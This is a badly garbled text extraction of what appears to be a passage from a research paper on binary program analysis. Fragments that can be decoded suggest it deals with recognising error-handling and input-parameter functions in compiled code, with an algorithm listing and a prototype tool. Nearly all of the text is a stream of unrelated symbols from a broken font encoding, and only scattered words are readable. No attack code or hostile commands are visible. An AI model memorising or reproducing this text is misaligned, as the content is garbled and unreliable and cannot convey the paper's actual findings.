✏ ✎ ✓ ✔ ✘ ✍ ✏ ✘ ✓ ☛ ✌ ✘ ☞ ✒✔ ☞☞☛✢
✔ ☞ ❛ ✌ Ð ✔➂♣
☛ ✕ ➂ ✛ ➂ ✘ ✏ ✓ ➂ ✛ ➂ ✌ ✘✈
☛ ❛ ✌ ✕ ➂ ✛ ➂ ❛ ✔ ☛ ☞✓ ➂ ✛ ➂ñ
✘ Ð ✘ ✏✇
✘ ➂✇
t ✌ ✍ t ☛ ✑ ✔ ✍ ✏ ✒ ✙✒✏ ✘ ✌ ✘ ✓ t ✔ ✏ ✖ ✓ ✗ ✖ ✓ ✌ ✘ ✎ ✏ ✑ ✒ ☛ ✓ ✌ ✏ ✘✇
t ✔ ✘ t ☛ ✘ ✕ ❛ ✌ ✘✢
✓ t ✔ ✔ ✑ ✑ ✏ ✑ ☞✳❬ ✔ ✘ ✏ ✓ ✔ ✓ t ✔✜
✘ ✗ ✖ ✓ò
✑ ✑ ✏ ✑ ✓ ✏♣
✔ ✓ t ✔ ❛ ☛♣
✔ ❛ ✏ ✎ ✓ t ✔ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ✕ ☛ ✓ ☛♣
☛ ☞ ✔✏ ✎ ✓ t ✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✌ ✘ ✗ ✖ ✓ ✛ ✕ ✔ ✘ ✏ ✓ ✔ ✓ t ✔ ✤ ✓ ❛ ✌♣
✭ ➂✜
✘ ✗ ✖ ✓ò
✑ ✑ ✏ ✑ ➂ ✥ ✓ ✏♣
✔ ✓ t ✔ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ❛ ✌♣
✑ ☛ ✑ ✚ ✳ ✤ ✓ ❛ ✌♣
✭ ➂✜
✘ ✗ ✖ ✓ò
✑ ✑ ✏ ✑ ➂ ✥ ❂ 4 ➂♣
☛ ✕ ➂ ✛ ➂ ✘ ✏ ✓ ➂ ✛➂ ✌ ✘✈
☛ ❛ ✌ ✕ ➂ ✛ ✳ ✳ ✳ 6 ✳✜
✘ ✗ ✖ P ☛ ✑ ☛ ✏ ✎ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✎ ✌ ☞ ✌ ✘ ✗ ✖ ✓ ✗ ☛ ✑ ☛ ✒✔ ✓ ✔ ✑✢
✔ ✓♣
✚ ✕ ✔ ✍ ✏ ✒✗ ✌ ❛ ✔ ✑ ✛ ❛ ✌ Ð ✔✜
❬❆
P ✑ ✏ ✳❆
✍ ✍ ✏ ✑ ✕ ✌ ✘✢
✓ ✏ ✓ t ✔ ✕ ✌ ✎ ✎ ✔ ✑ ✔ ✘ ✓☞✌ ✓ ✖ ☛ ✓ ✌ ✏ ✘ ☞✛✇
✔ ✕ ✌✈
✌ ✕ ✔ ✕ó
✤ò ô
✌ ✘ ✓ ✏ ✓ t ✑ ✔ ✔ ✗ ☛ ✓ ✓ ✔ ✑ ✘ ☞✳❋ ✡   õ✄ ✞ ✂ ✄ ✄ ☎   ✟ ♦ ❢ ö ❋ ÷ øù ú õ☎   û ✆ ☎ ✦ ✟ ☎ ✆ ✞ ✂ ✄ ✄ ☎   ✟✭ ❪ ✥ ✤ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ● ✱Ó Õ
î ï ❄ ✾ ❀ ❃ ❅ ✛ ✼ ❣ ✱ ✽ ✾ ❧ ✿ ❜ ❀ ❁Ó
❄ ❄ê
❡ ■ ❧ ❁ ❅ ✛ ❣ ❊● ❍♥ ■ ♠ ❡ ✏ ✑ ● ❍✿ ♥ îü
✾ ❃ ■ ❄ ■ ✱ ✽ ✾ ❧ ✿ ❜ ❀ ❁ý
♥ îü
✾Ó
❄ ❄ ï ❄ ❁ ❅ ✛ ● ✌ ☞ ✘ ✏ ✓✍ ✑ ✌ ✓ ✌ ✍ ☛ ❛ ✳✭ þ ✥ ❚ t ✔ ✑ ✔ ✔✣
✌ ☞✓ ☞ ✘ ✏ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ❣ ☞ ✖ ✍ t ✓ t ☛ ✓ ❣ ✱é ê
❃ ❀ ● ❅ ✛ ☛ ✘ ✕❣ ÿ ✱ ✽ ❃ ❄ ✾ ☞ ❳ ✾ ❄ ❨ ❃ ✳✤ ✏ ✑ ☞ ✏ ✒✔ ❛ ☛ ✑✢
✔ ✗ ✑ ✏✢
✑ ☛ ✒ ✛ ✓ t ✔ ✚ ✏ ✎ ✓ ✔ ✘ ✕ ✔ ➇ ✘ ✔ ✖ ☞ ✔ ✑ ✙ ✕ ✔ ➇ ✘ ✔ ✕✔ ✑ ✑ ✏ ✑ t ☛ ✘ ✕ ❛ ✌ ✘✢
✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞✛✇
t ✌ ✍ t ☛ ✑ ✔ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ✕♣
✚ ➂ ✔ ✑ ✑ ✏ ✑ ➂ ✛➂✇
☛ ✑ ✘ ➂ ✛ ☞ ✖ ✍ t ☛ ☞ ✓ t ✔ ✗ ✘✢ ✇
☛ ✑ ✘ ✌ ✘✢
☛ ✘ ✕ ✗ ✘✢
✔ ✑ ✑ ✏ ✑ ✌ ✘ ✓ t ✔❛ ✌♣
✗ ✘✢
❛ ✌♣
✑ ☛ ✑ ✚ ✛ ✓ t ✔ ✓ ✌ ✎ ✎✇
☛ ✑ ✘ ✌ ✘✢
✛ ✓ ✌ ✎ ✎ ✔ ✑ ✑ ✏ ✑ ✌ ✘ ❛ ✌♣
✓ ✌ ✎ ✎ ❭ þ ❫ ❴ ❛ ✌ ✙♣
✑ ☛ ✑ ✚ ✳ ❬ ✔ ✘ ✏ ✓ ✔Ó
❄ ❄ê
❡ ■ ❧ ✓ ✏♣
✔ ✓ t ✔ ❛ ☛♣
✔ ❛ ✏ ✎ ✓ t ✔ ✔ ✑ ✑ ✏ ✑t ☛ ✘ ✕ ❛ ✌ ✘✢
✎ ✔ ☛ ✓ ✖ ✑ ✔ ✕ ☛ ✓ ☛♣
☛ ☞ ✔ ✛ ✓ t ✔ ✘ ✓ t ✔ ✍ ✏ ✑ ✑ ✔ ☞ ✗ ✏ ✘ ✕ ✌ ✘✢
✎ ✔ ☛ ✙✓ ✖ ✑ ✔ ✕ ☛ ✓ ☛♣
☛ ☞ ✔ ✌ ☞ ✽ ✾ ❧ ✿ ❜ ❀ ❁Ó
❄ ❄ê
❡ ■ ❧ ❁ ❅ ✳ ✽ ✾ ❧ ✿ ❜ ❀ ❁Ó
❄ ❄ê
❡ ■ ❧ ❁ ❅ Ü4 ❁ ❡ ❄ ❄ ï ❄ ❁ ❈ ❁✇
■ ❄ ♥ ❁ ❈ ❍❍❍ 6 ✳ô
✏✇
✔✈
✔ ✑ ✛ ✓ t ✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✍ ✏ ✘ ✓ ☛ ✌ ✘ ✌ ✘✢
✓ t ✔ ✎ ✔ ☛ ✓ ✖ ✑ ✔ ☞ ✒ ☛ ✚ ✘ ✏ ✓♣
✔✓ t ✔ ✔ ✑ ✑ ✏ ✑ t ☛ ✘ ✕ ❛ ✌ ✘✢
✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✛ ☞ ✖ ✍ t ☛ ☞ ✓ t ✔ ✗ ✘✢
✒ ☛ ❛ ❛ ✏ ✍✇
☛ ✑ ✘ ✏ ✎❛ ✌♣
✗ ✘✢
❛ ✌♣
✑ ☛ ✑ ✚❧
✌ ✓ ✌ ☞ ☛ ✍ ✓ ✖ ☛ ❛ ❛ ✚ ✓ t ✔ ✒✔ ✒✏ ✑ ✚ ☛ ❛ ❛ ✏ ✍ ☛ ✓ ✌ ✏ ✘ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✳❚ t ✔ ✑ ✔ ✎ ✏ ✑ ✔ ✛ ✌ ✓ ✌ ☞ ✘ ✔ ✍ ✔ ☞☞☛ ✑ ✚ ✓ ✏ ☛ ✘ ☛ ❛ ✚ ☞✌ ☞ ✓ t ✔ ✍ ☛ ❛ ❛✢
✑ ☛ ✗ t ✏ ✎✓ t ✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✛ ✌ ✓ ☞t ✏ ✖ ❛ ✕ ✏ ✘ ❛ ✚ ✍ ✏ ✘ ✓ ☛ ✌ ✘ ☞✓ ✑ ✌ ✘✢
✏ ✖ ✓ ✗ ✖ ✓ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞✏ ✑ ☞✓ ✑ ✌ ✘✢
✏ ✗ ✔ ✑ ☛ ✓ ✌ ✏ ✘ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞✛ ☛ ✘ ✕ ✕ ✏ ✔ ☞ ✘ ✏ ✓ ✍ ✏ ✘ ✓ ☛ ✌ ✘❆
P✜✌ ✘ ✓ ✔ ✑ ✎ ☛ ✍ ✔ ☞ ✏ ✎ ✏ ✓ t ✔ ✑ ✘ ✏ ✘ ✙ ✗ ✑ ✌ ✘ ✓ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ☞✳❆
✘ ✏ ✓ t ✔ ✑ ✗ ✏ ☞☞✌♣
✌ ❛ ✌ ✓ ✚ ✌ ☞ ✓ t ☛ ✓ ✓ t ✔ ✗ ✑ ✏✢
✑ ☛ ✒ t ☛ ☞ ✖ ☞ ✔ ✑ ✙ ✕ ✔ ➇ ✘ ✔ ✕✔ ✑ ✑ ✏ ✑ t ☛ ✘ ✕ ❛ ✌ ✘✢
✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✛♣
✖ ✓ ✓ t ✔ ✎ ✖ ✘ ✍ ✓ ✌ ✏ ✘ ✘ ☛ ✒✔ ✌ ☞ ✘ ✏ ✓ ✑ ✔ ✍ ✙
97
♦   ✁ ✂ ✄ ☎ ✆ ❜ ✝ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ❊ r r ❉ ❡ ✡ ❧ ✠ ➂ ✳ ❚ ☛ ☎ ☞ ☎ ✌ ♦ ☞ ☎ ✍ ❝ ☛ ☎ ❝ ✎ ✇ ☛ ☎ ✏ ☛ ☎ ☞✏ ☛ ☎ ✂ ✁ ✑ ✒ ✏ ✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ✂ ✁ ✌ ♦ ☞ ✓♣ ✏ ✂ ♦ ✁ ✂ ✔ ✂ ✁ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ■ ♥ ✕ ✖ ✞ ❊ r r ✗ r ✠ ➂♣ ✁ ✆ ✂ ✔ ✁ ♦ ✏ ❝ ☞ ✂ ✏ ✂ ❝ ♣
✘✳
✙✌ ✂ ✆ ☎ ✁ ✏ ✂ ✌ ✝ ✂ ✁   ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✍ ✏ ☛ ☎ ✁ ♣ ✆ ✆ ✏ ☛ ☎✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁
❢✔ ✁ ♣ ✓ ☎ ✏ ♦ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ❊ r r ❉ ❡ ✡ ❧ ✠ ➂ ✏ ♦ ☎
1✑ ♣ ✁ ✆ ✂ ✏ ✳❙ ✚ ✛ ✜ ✢ ✣ ✤ ✥ ✦ ✦ ✚ ✧ ✢ ✜ ★ ◆ ✩ ✪ ✫✬ ▲ ✜ ✮ ✤ ✥ ✦ ✦ ✚ ✧ ✢✯ ✰ ✱ ✲ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✴ ✵ ❊ ✶ ✕ ✗ r ✞ ✭ P ➂ ✷ ✸ ❣ ✵ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ✹ ✗ ❣ ✠ ➂ ✷ ❣ ✺✴ ✻♥ ✡ ♠ ❡ ♦ ☞ ✴ ✂ ✔ ❝ ☞ ✂ ✏ ✂ ❝ ♣
✘✍ ✴ ✻ ✐ ♥ ✕ ✖ ✞ P ✡ r ✡ ✵ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ■ ♥ ✕ ✖ ✞ ❊r r ✗ r ✠ ➂ ✳✯
✼✱ ❚ ☛ ☎ ☞ ☎ ☎
1✂ ✔✏ ✔ ✁ ♦ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ❣ ✔ ✒ ❝ ☛ ✏ ☛ ♣ ✏ ❣ ✵
❇❉ P ✭ ✴ ➂ ✍ ♣ ✁ ✆❣
✽✵ ❋ P r ✞
✾ ✿✞ r
▼P ✳✙✁ ♣ ✆ ✆ ✂ ✏ ✂ ♦ ✁ ✏ ♦ ✏ ☛ ☎
➇☞ ✔✏ ✏ ✝ ✑ ☎ ✍ ♣ ✁ ♦ ✏ ☛ ☎ ☞ ❝ ♦ ✓✓ ♦ ✁ ☎ ☞ ☞ ♦ ☞ ☛ ♣ ✁
❤✆
✘✂ ✁   ✂ ✔ ✏ ☛ ☎
✘♦   ☞ ☎ ❝ ♦ ☞ ✆ ✔ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✌ ☎ ♣ ✏ ✒ ☞ ☎ ✆ ❜ ✝
❀ ✘♦  
❀✍
❀✆ ☎ ❜ ✒  
❀♣ ✁ ✆ ✔♦ ♦ ✁ ✍ ✔ ✒ ❝ ☛ ♣ ✔ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ☎
1✂ ✌
✘♦   ✂ ✁
✘✂ ❜ ☎
1✂ ✌ ❁ ✰ ❂ ❃
✘✂ ❜ ☞ ♣ ☞ ✝ ✳❄ ☎ ✁ ♦ ✏ ☎ ✏ ☛ ☎ ❅ ♦   ✏ ♦ ❜ ☎ ✏ ☛ ☎ ✌ ☎ ♣ ✏ ✒ ☞ ☎ ✆ ♣ ✏ ♣ ❜ ♣ ✔☎ ♦ ✌ ✏ ☛ ☎
✘♦   ☞ ☎ ❝ ♦ ☞ ✆ ✔ ✳❋ ✞ ❧ ✐ ✟ ✭ ✠ ✹ ✗ ❣ ✠ ➂
❆ 4✠ ❧ ✗ ❣ ✠ ✷ ✠
❞❡ ✟ ✖ ❣ ✠ ✷ ✻✻✻
6✳ ❚ ☛ ☎ ✔☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✔ ❝ ♣ ✁✑ ☞ ✂ ✁ ✏ ✏ ☛ ☎ ✁ ♦ ☞ ✓♣
✘✂ ✁ ✌ ♦ ☞ ✓♣ ✏ ✂ ♦ ✁ ♣ ✔ ✇ ☎
✘ ✘♣ ✔ ✏ ☛ ☎ ✇ ☞ ♦ ✁   ✂ ✁ ✌ ♦ ☞
❤✓♣ ✏ ✂ ♦ ✁ ✳ ❚ ☛ ☎ ☞ ☎ ✌ ♦ ☞ ☎ ✍ ✂ ✏ ✂ ✔ ✁ ☎ ❝ ☎ ✔✔ ♣ ☞ ✝ ✏ ♦ ✌ ✒ ☞ ✏ ☛ ☎ ☞ ✂ ✆ ☎ ✁ ✏ ✂ ✌ ✝ ✏ ☛ ☎✂ ✁ ✑ ✒ ✏ ✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ✂ ✁ ✌ ♦ ☞ ✓♣ ✏ ✂ ♦ ✁ ❜ ✝ ❝ ☛ ☎ ❝ ✎ ✂ ✁   ✇ ☛ ☎ ✏ ☛ ☎ ☞ ✏ ☛ ☎ ✂ ✁ ✑ ✒ ✏✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ✂ ✁ ✌ ♦ ☞ ✓♣ ✏ ✂ ♦ ✁ ✂ ✔ ✂ ✁ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ■ ♥ ✕ ✖ ✞ ❊ r r ✗ r ✠ ➂ ✳ ❈ ✁ ♦ ✏ ☛ ☎ ☞✑ ♦ ✔✔ ✂ ❜ ✂
✘✂ ✏ ✝ ✂ ✔ ✏ ☛ ♣ ✏ ✏ ☛ ☎ ✑ ☞ ♦   ☞ ♣ ✓ ☛ ♣ ✔ ❅ ♦   ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✍ ❜ ✒ ✏ ✏ ☛ ☎✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✁ ♣ ✓ ☎ ✂ ✔ ✁ ♦ ✏ ✂ ✁ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ✹ ✗ ❣ ✠ ➂ ✳ ❚ ☛ ☎ ☞ ☎ ✌ ♦ ☞ ☎ ✍ ❝ ☛ ☎ ❝ ✎✇ ☛ ☎ ✏ ☛ ☎ ☞ ✏ ☛ ☎ ✂ ✁ ✑ ✒ ✏ ✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ✂ ✔ ✂ ✁ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ■ ♥ ✕ ✖ ✞ ❊ r r ✗ r ✠ ➂ ✍♣ ✁ ✆ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✂ ✔ ❝ ☞ ✂ ✏ ✂ ❝ ♣
✘✳
✙✌ ✂ ✆ ☎ ✁ ✏ ✂ ✌ ✝ ✂ ✁   ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✍ ✏ ☛ ☎ ✁♣ ✆ ✆ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁
❢✔ ✁ ♣ ✓ ☎ ✏ ♦ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ✹ ✗ ❣ ✠ ➂ ✏ ♦ ☎
1✑ ♣ ✁ ✆ ✂ ✏ ✳● ❍ ❏
✧ ✣ ✤ ✥ ✦ ✦ ✚ ✧ ✢ ✜ ★ ◆ ✩ ✪ ✫✬❯
✢❑
✤ ✚ ✛❏ ❖
✚ ✣ ✤ ✥ ✦ ✦ ✚ ✧ ✢✯ ✰ ✱ ✴ ✻ ✐ ♥ ✕ ✖ ✞ P ✡ r ✡ ✵ ❋ ✞ ❧ ✐ ✟ ✭ ✠ ■ ♥ ✕ ✖ ✞ ❊ r r ✗ r ✠ ➂ ✳✯
✼✱ ✲ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✴ ✵ ❋ P r ✞ ✍ ♦ ☞ ✏ ☛ ☎ ☞ ☎ ☎
1✂ ✔✏ ✔ ✁ ♦ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ❣ ✍ ✔ ✒ ❝ ☛✏ ☛ ♣ ✏ ❣ ✵
❇❉ P ✭ ✴ ➂ ✍ ♣ ✁ ✆ ❣
✽✵ ❋ P r ✞
✾ ✿✞ r
▼P ✳✙✏ ✂ ✔ ♣
✘✔♦ ✑ ♦ ✔✔ ✂ ❜
✘☎ ✏ ☛ ♣ ✏ ✏ ☛ ☎ ✑ ☞ ♦   ☞ ♣ ✓ ✆ ♦ ☎ ✔ ✁ ♦ ✏ ☎
1✑ ♦ ☞ ✏✏ ☛ ☎ ✒ ✔☎ ☞
❤✆ ☎
➇✁ ☎ ✆ ☎ ☞ ☞ ♦ ☞ ☛ ♣ ✁ ✆
✘✂ ✁   ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✍ ♦ ☞ ✏ ☛ ☎ ☞ ☎ ✂ ✔ ✁ ♦✆ ☎
➇✁ ✂ ✏ ✂ ♦ ✁ ♦ ✌ ☎ ☞ ☞ ♦ ☞ ☛ ♣ ✁ ✆
✘✂ ✁   ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✳ ✲ ♦ ☞ ✏ ☛ ✂ ✔ ❝ ♣ ✔☎ ✍ ✔☎ ♣ ☞ ❝ ☛♣
✘ ✘✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✔ ✂ ✁ ✏ ☛ ☎ ✑ ☞ ♦   ☞ ♣ ✓✳ ❚ ☛ ☞ ♦ ✒   ☛ ✏ ☛ ☎ ✆ ✂ ✔ ♣ ✔✔☎ ✓ ❜
✘☎ ☞ ✍✔☎ ♣ ☞ ❝ ☛ ✏ ☛ ☎ ✂ ✁ ✑ ✒ ✏ ✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ✂ ✁ ✌ ♦ ☞ ✓♣ ✏ ✂ ♦ ✁ ♦ ✌ ✏ ☛ ☎ ❜ ♣ ✔ ✂ ❝ ✔✏ ☞ ✂ ✁  ♦ ✒ ✏ ✑ ✒ ✏ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✳
✙✌ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✑ ♣ ☞ ♣ ✓ ☎ ✏ ☎ ☞ ❝ ♦ ✁ ✏ ♣ ✂ ✁ ✔ ✏ ☛ ☎ ☎ ☞ ☞ ♦ ☞✓ ☎ ✔✔ ♣   ☎ ✍ ✏ ☛ ☎ ✁ ✏ ☞ ☎ ♣ ✏ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ♣ ✔ ☎ ☞ ☞ ♦ ☞ ☛ ♣ ✁ ✆
✘✂ ✁   ✍ ✔ ✒ ❝ ☛ ♣ ✔✏ ☛ ☎ ✔✔☛ ✔☎ ✏ ☎ ☞ ☞ ♦ ☞ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ♦ ✌
✘✂ ❜ ✔✔☛ ❁ ✰
◗❃
✘✂ ❜ ☞ ♣ ☞ ✝ ✍ ✇ ☛ ✂ ❝ ☛ ✂ ✔ ✏ ☛ ☎✂ ✁ ✏ ☎ ☞ ✁ ♣
✘✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✇ ✂ ✏ ☛ ✁ ♦ ☎
1✑ ♦ ☞ ✏ ✆ ☎
➇✁ ☎ ✆ ❜ ✝ ✏ ☛ ☎
✘✂ ❜ ✔✔☛ ✳❘ ❱ ❲ ❳ ❨ ❦ ❩ ❬ ❳ ❨ ❦ ❭ ❳ ❬ ❦ ❳ ❛ ❪ ❫ ❬❴ ❩ ❵ ❭ ❥ ❈ ✌ ✏ ☎ ☞ ☞ ☎ ❝ ♦   ✁ ✂ ✄ ✂ ✁   q ✲ s t ✍❈
✘  ♦ ☞ ✂ ✏ ☛ ✓
✼✯ ✉ ♣ ❝ ✎ ✈ ♣ ☞ ✎ ✱ ✂ ✔ ✑ ☞ ☎ ✔☎ ✁ ✏ ☎ ✆ ✏ ♦ ✓♣ ☞ ✎ q ✲ s t ✉ ✒ ✔☎ ✆✂ ✁ ❈
✘  ♦ ☞ ✂ ✏ ☛ ✓ ✰ ✳ ✲ ✒ ✁ ❝ ✏ ✂ ♦ ✁ 2 ☎ ✏ 3 ♣ ✏ ✏ ☎ ☞ ✁ ✂ ✔ ✒ ✔☎ ✆ ✏ ♦   ☎ ✏ ✏ ☛ ☎✑ ♣ ✏ ✏ ☎ ☞ ✁ ♦ ✌ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ✆ ☎
➇✁ ☎ ✆ ♣ ❜ ♦ 5 ☎ ✳
✙✌ ✂ ✏ ❜ ☎
✘♦ ✁   ✔ ✏ ♦ ✏ ☛ ☎ ✏ ☛ ☞ ☎ ☎✑ ♣ ✏ ✏ ☎ ☞ ✁ ✔ ♦ ✌ q ✲ s t ✍ ✏ ☛ ☎ ✁
7☎ ♣ ☞ ❝ ☛
8♦ ✁ ✆ ✂ ✏ ✂ ♦ q ♦ ✆ ☎ ✏ ☞ ♣ 5 ☎ ☞ ✔☎ ✔ ❜ ♣ ❝ ✎✏ ♦ ✔✏ ♣ ☞ ✏ ✂ ✁   ✑ ♦ ✂ ✁ ✏ ♦ ✌ ❜ ♣ ✔ ✂ ❝ ❜
✘♦ ❝ ✎ ❝ ♦ ✁ ✏ ♣ ✂ ✁ ✂ ✁   ✏ ☛ ☎ ✁ ♦ ✆ ☎ ✳ ❚ ☛ ☎ ✁✈ ♣ ☞ ✎ q ✲ s t ✓♣ ☞ ✎ ✔ ✏ ☛ ☎
✘♣ ❜ ☎
✘♦ ✌ q ✲ s t ✉ ✂ ✁ ✏ ☛ ☎ ❝ ✌   ✳ q ♦ ✏ ☎ ✏ ☛ ♣ ✏✏ ☛ ☎ ✂ ✁ ✑ ✒ ✏
8✲ 2 ✂ ✔ ✒ ✁ ✌ ♦
✘✆ ☎ ✆ ✍ ✇ ☛ ✂ ❝ ☛ ✓ ☎ ♣ ✁ ✔ ✏ ☛ ♣ ✏ ✏ ☛ ☎ ☞ ☎ ✂ ✔ ✁ ♦✘♦ ♦ ✑ ✔ ♣ ✁ ✆ ✏ ☛ ☎ ✌ ✒ ✁ ❝ ✏ ✂ ♦ ✁ ❝ ♣
✘ ✘✔ ♣ ☞ ☎ ♣
✘☞ ☎ ♣ ✆ ✝ ✒ ✁ ✌ ♦
✘✆ ☎ ✆ ✳✙ ✙ ✙✳
✙9 10 ❶ ❷ 9 ❷ ❸ ❹ ❺ ❹ ❻ ❼ ❸✙✁ ♦ ☞ ✆ ☎ ☞ ✏ ♦ 5 ☎ ☞ ✂ ✌ ✝ ✏ ☛ ☎ ☎ ✌ ✌ ☎ ❝ ✏ ✂ 5 ☎ ✁ ☎ ✔✔ ♦ ✌ ✏ ☛ ☎ ✓ ☎ ✏ ☛ ♦ ✆ ♦ ✌q ✲ s t ✉ ✑ ♣ ✏ ✏ ☎ ☞ ✁ ☞ ☎ ❝ ♦   ✁ ✂ ✏ ✂ ♦ ✁ ✍ ✇ ☎ ✂ ✓✑
✘☎ ✓ ☎ ✁ ✏ ✏ ☛ ☎ ✑ ☞ ♦ ✏ ♦ ✏ ✝ ✑ ☎✏ ♦ ♦
✘3 ☞ ✒ ✁ s ❜ ✏ ✳ 3 ☞ ✒ ✁ s ❜ ✏ ✂ ✔ ✆ ☎ 5 ☎
✘♦ ✑ ☎ ✆ ❜ ♣ ✔☎ ✆ ♦ ✁ ♦ ✒ ☞ ❜ ✂ ✁ ♣ ☞ ✝✂ ✁ ✏ ☎   ☎ ☞ 5 ✒
✘✁ ☎ ☞ ♣ ❜ ✂
✘✂ ✏ ✝ ✔ ❝ ♣ ✁ ✁ ✂ ✁   ✑
✘♣ ✏ ✌ ♦ ☞ ✓
7✏ ♣ ✏ ✂ ❝ ✏ ♣ ✂ ✁ ✏ ♣ ✁ ✆
✙❄ ❈3 ☞ ♦ ✳
7✏ ♣ ✏ ✂ ❝ ✏ ♣ ✂ ✁ ✏
➇☞ ✔✏
✘✝ ✒ ✔☎ ✔
✙❄ ❈ 3 ☞ ♦ ✏ ♦ ✆ ✂ ✔ ♣ ✔✔☎ ✓ ❜
✘☎ ❜ ✂ ✁ ♣ ☞ ✝
❽ ❾ ✮ ✜ ✧❏
✦❍
❿ ➀✉ ♣ ❝ ✎ ✏ ☞ ♣ ❝ ✎ ✓♣ ☞ ✎ ♣
✘  ♦ ☞ ✂ ✏ ☛ ✓✯ ✉ ♣ ❝ ✎ ✈ ♣ ☞ ✎ ✱➁✢ ✤ ➃ ✦ ✬✒ ✁ ✌ ♦
✘✆ ☎ ✆
8✲ 2
➄ ➅✴ ❣
➆➈
➃ ✦ ✤ ➃ ✦ ✬✓♣ ☞ ✎ ☎ ✆ q ✲ s t ✉ ✂ ✁
➅✴ ❣
➆➉ ➊ ♥ ✗
❞❡ ➋
➅✴ ❣ ✻❡ ♥ ✞ r ➌
➆➍ ➊ ➎ ❍ ❏
❾ ✚♥ ✗
❞❡ ➏
❆➐ ➑ ✹ ✹
✣ ✜➒➊ ❏
★■
➓ ➔✡ ❧ ❧ ✭ ♥ ✗
❞❡ ➂
✦❍
✚ ✢→➊ ✏ ✝ ✑ ➋ 2 ☎ ✏ 3 ♣ ✏ ✏ ☎ ☞ ✁ ✯ ♥ ✗
❞❡ ✱
➆➣➊ ❏
★■
➓P ✡ ✞ ✞ ❡ r ♥ ✭ ✞ ➌ ✕ ➂
✦❍
✚ ✢↔ ➊ ❝ ♦ ✁ ✆ q ♦ ✆ ☎ ➋
7☎ ♣ ☞ ❝ ☛
8♦ ✁ ✆ ✂ ✏ ✂ ♦ ✁ q ♦ ✆ ☎ ✯ ♥ ✗
❞❡ ✱
➆↕ ➊ ✈ ♣ ☞ ✎ ✈ ✂
✘✆ s ☞ ☞ ♦ ☞ t ♣ ✁ ✆
✘✂ ✁   ✯ ❝ ♦ ✁ ✆ q ♦ ✆ ☎ ✱
➆➙ ➊
✚ ✢ ✣❏
★➛ ➊
✚ ✢ ✣❏
★➉
➜➊ ♥ ✗
❞❡
❆♥ ✗
❞❡ ✻ ✐ ✞ ❡ r ♥ ❡ ✶ ✞ ✭ ➂ ✳➉ ➉ ➊
✚ ✢ ✣➎ ❍ ❏
❾ ✚❝ ♦ ✆ ☎ ✍ ♣ ✁ ✆ ✏ ☛ ☎ ✁ ✏ ☞ ♣ ✁ ✔
✘♣ ✏ ☎ ✔ ✂ ✏ ✂ ✁ ✏ ♦ ✂ ✁ ✏ ☎ ☞ ✓ ☎ ✆ ✂ ♣ ✏ ☎
✘♣ ✁   ✒ ♣   ☎
➝✂ ✁ ☎❁
✼➞ ❃ ✳ ❈ ✌ ✏ ☎ ☞ ✏ ☛ ♣ ✏ ✔ ❝ ♣ ✁ ✂ ✁ ✏ ☎   ☎ ☞ ♦ 5 ☎ ☞ ➟ ♦ ✇ 5 ✒
✘✁ ☎ ☞ ♣ ❜ ✂
✘✂ ✏ ✝ ♦ ✁
➝✂ ✁ ☎ ✳3 ☞ ✒ ✁ s ❜ ✏ ✂ ✔ ✆ ☎ 5 ☎
✘♦ ✑ ☎ ✆ ❜ ✝ ➠ ❝ ♣ ✓
✘♣ ✁ ✆
8➡ ➡ ✍ ♣ ❜ ♦ ✒ ✏ ➞ ➢ ➢ ➢
